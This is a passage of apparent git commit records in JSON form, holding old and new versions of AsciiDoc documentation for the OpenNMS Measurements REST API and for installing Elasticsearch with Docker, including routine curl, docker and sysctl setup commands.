\"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","old_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds. If < 0, the effective value will be `end - start`\n (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available bellow.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"5170390b8fcaaccd421b52f861c2e3dd283b2b62","subject":"Measurement ReST API: better explanation of the \"start\" option","message":"Measurement ReST API: better explanation of the \"start\" option","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds.\n\n If > 0, the timestamp is relative to the UNIX epoch (January 1st 1970 00:00:00 AM).\n \n If < 0, the timestamp is relative to the `end` option (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available bellow.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","old_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds. If < 0, the effective value will be `end - start`\n (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available bellow.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"a4ab7f9d03ee0446fa1be04e34677e7c521a6f15","subject":"[DOCS] Docker configs should set `network.host` to `0.0.0.0` (#80042)","message":"[DOCS] Docker configs should set `network.host` to `0.0.0.0` (#80042)\n\nThe `elasticsearch.yml` file that ships with our Docker image includes the\r\n`network.host: 0.0.0.0` setting by default. If a user bind-mounts a custom\r\nconfig file, it should include this setting to ensure Elasticsearch is reachable.\r\n\r\nCloses #77937.","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/setup\/install\/docker.asciidoc","new_file":"docs\/reference\/setup\/install\/docker.asciidoc","new_contents":"[[docker]]\n=== Install {es} with Docker\n\n{es} is also available as Docker images. Starting with version 8.0.0, these\nare based upon a tiny core of essential files. Prior versions used\nhttps:\/\/hub.docker.com\/_\/centos\/[centos:8] as the base image.\n\nA list of all published Docker images and tags is available at\nhttps:\/\/www.docker.elastic.co[www.docker.elastic.co]. The source files\nare in\nhttps:\/\/github.com\/elastic\/elasticsearch\/blob\/{branch}\/distribution\/docker[Github].\n\ninclude::license.asciidoc[]\n\nStarting in {es} 8.0, security is enabled by default. With security enabled,\n{stack} {security-features} require TLS encryption for the transport networking\nlayer, or your cluster will fail to start.\n\n==== Install Docker Desktop or Docker Engine\n\nInstall the appropriate https:\/\/docs.docker.com\/get-docker\/[Docker application]\nfor your operating system.\n\nNOTE: Make sure that Docker is allotted at least 4GiB of memory. In Docker\nDesktop, you configure resource usage on the Advanced tab in Preference (macOS)\nor Settings (Windows).\n\n==== Pull the {es} Docker image\n\nObtaining {es} for Docker is as simple as issuing a `docker pull` command\nagainst the Elastic Docker registry.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so no\nDocker image is currently available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n\n[source,sh,subs=\"attributes\"]\n----\ndocker pull {docker-repo}:{version}\n----\n\nendif::[]\n\nNow that you have the {es} Docker image, you can start a \n<<docker-cli-run-dev-mode,single-node>> or <<docker-compose-file,multi-node>>\ncluster.\n\n[[docker-cli-run-dev-mode]]\n==== Start a single-node cluster with Docker\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of the {es} Docker image has not yet been released.\n\nendif::[]\n\nIf you're starting a single-node {es} cluster in a Docker container, security\nwill be automatically enabled and configured for you. When you start {es} for\nthe first time, the following security configuration occurs automatically:\n\n* <<elasticsearch-security-certificates,Certificates and keys>> are generated\nfor the transport and HTTP layers.\n* The Transport Layer Security (TLS) configuration settings are written to\n`elasticsearch.yml`.\n* A password is generated for the `elastic` user.\n* An enrollment token is generated for {kib}.\n\nYou can then {kibana-ref}\/docker.html[start {kib}] and enter the enrollment\ntoken, which is valid for 30 minutes. This token automatically applies the\nsecurity settings from your {es} cluster, authenticates to {es} with the\n`kibana_system` user, and writes the security configuration to `kibana.yml`. \n\nThe following command starts a single-node {es} cluster for development or\ntesting.\n\n. Start {es} in Docker. A password is generated for the `elastic` user and\noutput to the terminal, plus an enrollment token for enrolling {kib}.\n+\n--\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,sh,subs=\"attributes\"]\n----\ndocker run --name es-node01 -p 9200:9200 -p 9300:9300 -it {docker-image}\n----\n\nendif::[]\n--\n+\nTIP: You might need to scroll back a bit in the terminal to view the password\nand enrollment token.\n\n. Copy the generated password and enrollment token and save them in a secure\nlocation. These values are shown only when you start {es} for the first time.\n+\n[NOTE]\n====\nIf you need to reset the password for the `elastic` user or other\nbuilt-in users, run the <<reset-password,`elasticsearch-reset-password`>> tool.\nThis tool is available in the {es} `\/bin` directory of the Docker container.\nFor example:\n\n[source,sh]\n----\ndocker exec -it es-node01 \/usr\/share\/elasticsearch\/bin\/reset-elastic-password\n----\n====\n\n. Copy the `http_ca.crt` security certificate from your Docker container to\nyour local machine.\n+\n[source,sh]\n----\ndocker cp es-node01:\/usr\/share\/elasticsearch\/config\/tls_auto_config_*\/http_ca.crt .\n----\n\n. Open a new terminal and verify that you can connect to your {es} cluster by\nmaking an authenticated call, using the `http_ca.crt` file that you copied from\nyour Docker container. Enter the password for the `elastic` user when prompted.\n+\n[source,sh]\n----\ncurl --cacert http_ca.crt -u elastic https:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n\n===== Next steps\n\nYou now have a test {es} environment set up. Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[elasticsearch-security-certificates]]\n===== Security certificates and keys\n\nWhen you start {es} for the first time, the following certificates and keys are\ngenerated in the\n`\/usr\/share\/elasticsearch\/config\/tls_auto_config_initial_node_<timestamp>`\ndirectory in the Docker container, and allow you to connect a {kib} instance\nto your secured {es} cluster and encrypt internode communication. The files are\nlisted here for reference.\n\n`http_ca.crt`::\nThe CA certificate that is used to sign the certificates for the HTTP layer of\nthis {es} cluster.\n\n`http_keystore_local_node.p12`::\nKeystore that contains the key and certificate for the HTTP layer for this node.\n\n`transport_keystore_all_nodes.p12`::\nKeystore that contains the key and certificate for the transport layer for all\nthe nodes in your cluster.\n\n[[docker-compose-file]]\n==== Start a multi-node cluster with Docker Compose\n\nWhen defining multiple nodes in a `docker-compose.yml` file, you'll need to\nexplicitly enable and configure security so that {es} doesn't try to generate a\npassword for the `elastic` user on every node. \n\n===== Prepare the environment\n\nThe following example uses Docker Compose to start a three-node {es} cluster.\nCreate each of the following files inside of a new directory. Copy and paste the\ncontents of each example into the appropriate file as described in the\nfollowing sections:\n\n* <<docker-instances-yml,`instances.yml`>>\n* <<docker-env,`.env`>>\n* <<docker-create-certs,`create-certs.yml`>>\n* <<docker-docker-compose,`docker-compose.yml`>>\n\n[[docker-instances-yml]]\n[discrete]\n===== `instances.yml`\n\nWhen you run the example, {es} uses this file to create a three-node cluster.\nThe nodes are named `es01`, `es02`,and `es03`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::instances.yml[]\n----\nendif::[]\n--\n\n[[docker-env]]\n[discrete]\n===== `.env`\n\nThe `.env` file sets environment variables that are used when you run the\nexample. Ensure that you specify a strong password for the `elastic` user with\nthe `ELASTIC_PASSWORD` variable. This variable is referenced by the\n`docker-compose.yml` file.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::.env[]\n----\nendif::[]\n--\n\n`COMPOSE_PROJECT_NAME`:: Adds an `es_` prefix for all volumes and networks\ncreated by `docker-compose`.\n\n`CERTS_DIR`:: Specifies the path inside the Docker image where {es} expects the\nsecurity certificates.\n\n`ELASTIC_PASSWORD`:: Sets the initial password for the `elastic` user.\n\n[discrete]\n[[docker-create-certs]]\n===== `create-certs.yml`\n\nThe `create-certs.yml` file includes a script that generates node certificates\nand a certificate authority (CA) certificate and key where {es} expects them.\nThese certificates and key are placed in a Docker volume named `es_certs`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::create-certs.yml[]\n----\nendif::[]\n--\n\n[[docker-docker-compose]]\n[discrete]\n===== `docker-compose.yml`\n\nThe `docker-compose.yml` file defines configuration settings for each of your\n{es} nodes.\n\nNOTE: This sample `docker-compose.yml` file uses the `ES_JAVA_OPTS`\nenvironment variable to manually set the heap size to 512MB. We do not recommend\nusing `ES_JAVA_OPTS` in production.\nSee <<docker-set-heap-size,manually set the heap size>>.\n\nThis configuration exposes port `9200` on all network interfaces. Given how\nDocker manipulates `iptables` on Linux, this means that your {es} cluster is\npublicly accessible, potentially ignoring any firewall settings. If you don't\nwant to expose port `9200` and instead use a reverse proxy, replace `9200:9200`\nwith `127.0.0.1:9200:9200` in the `docker-compose.yml` file. {es} will then only\nbe accessible from the host machine itself.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::docker-compose.yml[]\n----\nendif::[]\n--\n\n===== Start your cluster with security enabled and configured\n\nThis sample Docker Compose file starts a three-node {es} cluster.\n\nThe https:\/\/docs.docker.com\/storage\/volumes[Docker named volumes]\n`data01`, `data02`, and `data03` store the node data directories so that the\ndata persists across restarts. If they don't already exist, running\n`docker-compose` creates these volumes.\n\n[[docker-generate-certificates]]\n. Generate the certificates. You only need to run this command one time:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml run --rm create_certs\n----\n\n. Start your {es} nodes with TLS configured on the transport layer:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n+\nNode `es01` listens on `localhost:9200` and `es02` and `es03` talk to `es01`\nover a Docker network.\n\n. Access the {es} API over TLS using the bootstrapped password for the `elastic`\nuser that you specified in the `.env` file:\n+\n[\"source\",\"sh\",subs=\"attributes\"]\n----\ndocker run --rm -v es_certs:\/certs --network=es_default {docker-image} curl --cacert \/certs\/ca\/ca.crt -u elastic:<password> https:\/\/es01:9200\n----\n\/\/ NOTCONSOLE\n+\n--\n`es_certs`:: The name of the volume that the script in `create-certs.yml`\ncreates to hold your certificates.\n\n`<password>`:: The password for the `elastic` user, defined by the\n`ELASTIC_PASSWORD` variable in the `.env` file.\n--\n\n. Submit a `_cat\/nodes` request to check that the nodes are up and running:\n+\n[source,sh]\n----\ncurl -X GET \"https:\/\/localhost:9200\/_cat\/nodes?v=true&pretty\"\n----\n\/\/ NOTCONSOLE\n\nLog messages go to the console and are handled by the configured Docker logging\ndriver. By default, you can access logs with `docker logs`. If you prefer that\nthe {es} container write logs to disk, set the `ES_LOG_STYLE` environment\nvariable to `file`. This causes {es} to use the same logging configuration as\nother {es} distribution formats.\n\nIf you need to generate a new password for the `elastic` user or any of the\nbuilt-in users, use the `elasticsearch-reset-password` tool:\n\nWARNING: Windows users not running PowerShell must remove all backslashes (`\\`)\nand join lines in the following command.\n\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/elasticsearch-reset-password \\\nauto --batch \\\n--url https:\/\/localhost:9200\"\n----\n\n===== Stop the cluster\nTo stop the cluster, run `docker-compose down`. The data in the Docker volumes\nis preserved and loaded when you restart the cluster with `docker-compose up`.\n\n--\n[\"source\",\"sh\"]\n----\ndocker-compose down\n----\n--\n\nTo **delete the data volumes** when you stop the cluster, specify the `-v`\noption:\n\n[\"source\",\"sh\"]\n----\ndocker-compose down -v\n----\n\nWARNING: Deleting data volumes will remove the generated security certificates\nfor your nodes. You will need to run `docker-compose` and \n<<docker-generate-certificates,regenerate the security certificates>> before\nstarting your cluster.\n\n===== Next steps\n\nYou now have a test {es} environment set up. Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[docker-prod-prerequisites]]\n==== Using the Docker images in production\n\nThe following requirements and recommendations apply when running {es} in Docker in production.\n\n===== Set `vm.max_map_count` to at least `262144`\n\nThe `vm.max_map_count` kernel setting must be set to at least `262144` for production use.\n\nHow you set `vm.max_map_count` depends on your platform:\n\n* Linux\n+\n--\nThe `vm.max_map_count` setting should be set permanently in `\/etc\/sysctl.conf`:\n[source,sh]\n--------------------------------------------\ngrep vm.max_map_count \/etc\/sysctl.conf\nvm.max_map_count=262144\n--------------------------------------------\n\nTo apply the setting on a live system, run:\n\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* macOS with https:\/\/docs.docker.com\/docker-for-mac[Docker for Mac]\n+\n--\nThe `vm.max_map_count` setting must be set within the xhyve virtual machine:\n\n. From the command line, run:\n+\n[source,sh]\n--------------------------------------------\nscreen ~\/Library\/Containers\/com.docker.docker\/Data\/vms\/0\/tty\n--------------------------------------------\n\n. Press enter and use`sysctl` to configure `vm.max_map_count`:\n+\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n\n. To exit the `screen` session, type `Ctrl a d`.\n--\n\n* Windows and macOS with https:\/\/www.docker.com\/products\/docker-desktop[Docker Desktop]\n+\n--\nThe `vm.max_map_count` setting must be set via docker-machine:\n\n[source,sh]\n--------------------------------------------\ndocker-machine ssh\nsudo sysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* Windows with https:\/\/docs.docker.com\/docker-for-windows\/wsl[Docker Desktop WSL 2 backend]\n+\n--\nThe `vm.max_map_count` setting must be set in the docker-desktop container:\n\n[source,sh]\n--------------------------------------------\nwsl -d docker-desktop\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n===== Configuration files must be readable by the `elasticsearch` user\n\nBy default, {es} runs inside the container as user `elasticsearch` using\nuid:gid `1000:0`.\n\nIMPORTANT: One exception is https:\/\/docs.openshift.com\/container-platform\/3.6\/creating_images\/guidelines.html#openshift-specific-guidelines[Openshift],\nwhich runs containers using an arbitrarily assigned user ID.\nOpenshift presents persistent volumes with the gid set to `0`, which works without any adjustments.\n\nIf you are bind-mounting a local directory or file, it must be readable by the `elasticsearch` user.\nIn addition, this user must have write access to the <<path-settings,config, data and log dirs>>\n({es} needs write access to the `config` directory so that it can generate a keystore).\nA good strategy is to grant group access to gid `0` for the local directory.\n\nFor example, to prepare a local directory for storing data through a bind-mount:\n\n[source,sh]\n--------------------------------------------\nmkdir esdatadir\nchmod g+rwx esdatadir\nchgrp 0 esdatadir\n--------------------------------------------\n\nYou can also run an {es} container using both a custom UID and GID. Unless you\nbind-mount each of the `config`, `data` and `logs` directories, you must pass\nthe command line option `--group-add 0` to `docker run`. This ensures that the user\nunder which {es} is running is also a member of the `root` (GID 0) group inside the\ncontainer.\n\n===== Increase ulimits for nofile and nproc\n\nIncreased ulimits for <<setting-system-settings,nofile>> and <<max-number-threads-check,nproc>>\nmust be available for the {es} containers.\nVerify the https:\/\/github.com\/moby\/moby\/tree\/ea4d1243953e6b652082305a9c3cda8656edab26\/contrib\/init[init system]\nfor the Docker daemon sets them to acceptable values.\n\nTo check the Docker daemon defaults for ulimits, run:\n\n[source,sh]\n--------------------------------------------\ndocker run --rm centos:8 \/bin\/bash -c 'ulimit -Hn && ulimit -Sn && ulimit -Hu && ulimit -Su'\n--------------------------------------------\n\nIf needed, adjust them in the Daemon or override them per container.\nFor example, when using `docker run`, set:\n\n[source,sh]\n--------------------------------------------\n--ulimit nofile=65535:65535\n--------------------------------------------\n\n===== Disable swapping\n\nSwapping needs to be disabled for performance and node stability.\nFor information about ways to do this, see <<setup-configuration-memory>>.\n\nIf you opt for the `bootstrap.memory_lock: true` approach,\nyou also need to define the `memlock: true` ulimit in the\nhttps:\/\/docs.docker.com\/engine\/reference\/commandline\/dockerd\/#default-ulimits[Docker Daemon],\nor explicitly set for the container as shown in the <<docker-compose-file, sample compose file>>.\nWhen using `docker run`, you can specify:\n\n[source,sh]\n----\n-e \"bootstrap.memory_lock=true\" --ulimit 